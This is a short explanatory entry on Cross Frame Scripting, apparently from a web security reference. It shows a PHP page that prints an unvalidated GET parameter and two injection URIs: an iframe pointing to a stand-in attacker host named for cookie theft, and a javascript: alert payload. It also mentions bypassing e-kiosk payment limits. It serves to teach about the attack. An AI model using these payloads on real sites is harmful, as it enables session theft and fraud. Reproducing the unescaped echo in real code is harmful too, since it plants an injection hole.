Description

Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Thanks to the XFS attacks he's able to inject his own content to a log in form, which purpose is to authorize the valid user to his/her bank or auction account.

Examples

The attacker has found a website, which allows for variable manipulation. In addition variables are sended using GET or POST methods but they are not properly validated, e.g.:

cat greetz.php<?phpprint "Hello! Welcome to Hell!";print $_GET['greetings'];?>If the attacker would write the following URI:

/greetz.php?greetings=<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>;then the successful code injection attack would be conducted.

Another example is a simple Java Script nesting:

/greetz.php?greetings=<iframesrc=javascript:alert('0wn3d!');></iframe>The attacker may merge the above examples with an appropriate frame attributes. After that it should be easier to adjust injected code to the original layout of the page, which is prone to a Cross Frame Scripting. This attack can also be successfully used to bypass limitations in e.g. E-kiosk, which provides Internet for a money or just to its extra functionality/areas.